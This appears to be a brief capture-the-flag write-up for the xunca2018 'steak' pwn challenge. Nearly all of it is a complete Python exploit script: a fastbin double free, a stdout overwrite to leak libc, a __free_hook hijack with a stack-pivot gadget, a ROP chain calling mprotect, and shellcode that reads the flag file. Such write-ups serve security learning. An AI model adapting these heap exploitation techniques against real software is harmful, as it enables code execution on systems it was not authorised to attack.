pwn

xunca2018

Note

找状态的一题,也学到很多新东西,善。

the way

the exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
from pwn_debug import *

#context.log_level = 'debug'

ins = pwn_debug('./steak')
ins.debug('2.23')

p = ins.run('debug')

def add(size,content):
	p.recvuntil('>')
	p.sendline('1')
	p.recvuntil('size:')
	p.sendline(str(size))
	p.recvuntil('buf:')
	p.sendline(content)

def delete(index):
	p.recvuntil('>')
	p.sendline('2')
	p.recvuntil('index:')
	p.sendline(str(index))

def edit(index,size,content,no):
	p.recvuntil('>')
	p.sendline('3')
	p.recvuntil('index:')
	p.sendline(str(index))
	p.recvuntil('size:')
	p.sendline(str(size))	
	p.recvuntil('buf:')
	if no:	
		p.send(content)
	else:
		p.sendline(content)

def copy(src,dst,length):
	p.recvuntil('>')
	p.sendline('4')
	p.recvuntil('index:')
	p.sendline(str(src))
	p.recvuntil('index')
	p.sendline(str(dst))
	p.recvuntil('length:')
	p.sendline(str(length))

add(0x60,'AAAA')#0
add(0x60,'BBBB')#1
delete(0)
delete(1)
delete(0)
add(0xf0,'CCCC')#2
add(0x10,'i am solider')#3
delete(2)
add(0x60,'AAAA')#4
add(0x60,'BBBB')#5
copy(2,4,8)
#raw_input('stop')
edit(4,2,str("\xdd\x55"),1)
add(0x60,'dfff')#6
#stdout_flag_adr 0x7ffff7dd5620
#stdout_io_write_base 0x7ffff7dd5638
#fake_fastbin_chunk  0x7ffff7dd55e5-0x8 0x70
add(0x60,'got_stdout');#7

fake_stdout = "\x00"*(0x7ffff7dd5620-0x7ffff7dd55ed)+p64(0xfbad1800)+"\x00"*0x19
#raw_input('stop')
edit(7,len(fake_stdout),fake_stdout,1)
# 0x39c600
leak_adr = u64(p.recvuntil('copy')[65:65+6].ljust(8,'\x00'))
libc_adr = leak_adr-0x39c600
p.info('[*] libc addr {}'.format(hex(libc_adr)))
#p.info('[*] test {}'.format(p.recvuntil('\x0a>')))

#one_gadget 0x3f43a 
#free_hook 0x7ffff7dd67a8
one_gadget = 0x3f43a 
delete(0)
#bss_fake_fast_chunk
edit(0,8,p64(0x60218d),1)
add(0x60,'AAAA')#8
#got bss
add(0x60,'f')#9
change_bss_arr = "\x00"*3+p64(0x7ffff7dd67a8)
edit(9,len(change_bss_arr),change_bss_arr,1)
#change free_hook
#0x000000000015a6b8 : xchg eax, edi ; xchg eax, esp ; ret
#thats fking amazing   free_hook with that gadget can do anything,no need leak heap adr or stack adr 
edit(0,8,p64(0x7ffff7b936b8),1)

#mprotect
#0x7ffff7a3aebb:	retf

context.bits=32

#print shellcraft.i386.linux.open('./flag')
# open -> read ->write
s = '''
	push 0x1010101
    xor dword ptr [esp], 0x1016660
    push 0x6c662f2e
    mov ebx, esp
    xor ecx, ecx
    xor edx, edx
    mov eax,5
    int 0x80
    mov ebx, eax
    mov eax,3 
    mov ecx, 0x602900
    mov edx,0x50
    int 0x80
    mov eax,4
    mov ebx, 1
    mov ecx, 0x602900
    mov edx,0x50
    int 0x80
'''
change_bss_arr2shellcode=asm(s)

context.bits=64

#where put shellcode
edit(9,len("\x00"*3+p64(0x602500)),"\x00"*3+p64(0x602500),1)
edit(0,len(change_bss_arr2shellcode),change_bss_arr2shellcode,1)
#rop
#0x0000000000400ca3 : pop rdi ; ret
#0x0000000000400ca1 : pop rsi ; pop r15 ; ret
#0x7ffff7b34b54 pop rdx ; pop rbx ; ret
#0x7ffff7b1f65a pop rax ; ret
#mov rdi,m_addr
#mov rsi,0x1000
#mov rdx,7 #read_write_exec
#mov     eax, 0Ah
#syscall
rop = p64(0x400ca3)+p64(0x602000)+p64(0x400ca1)+p64(0x1000)*2+p64(0x7ffff7b34b54)+p64(7)+p64(0)+p64(0x00007ffff7b1c5f0)+p64(0x17f6f4+libc_adr)+p64(0x602500)+p64(0x23)

edit(2,len(rop),rop,1)
raw_input('stop')
delete(2)
p.interactive()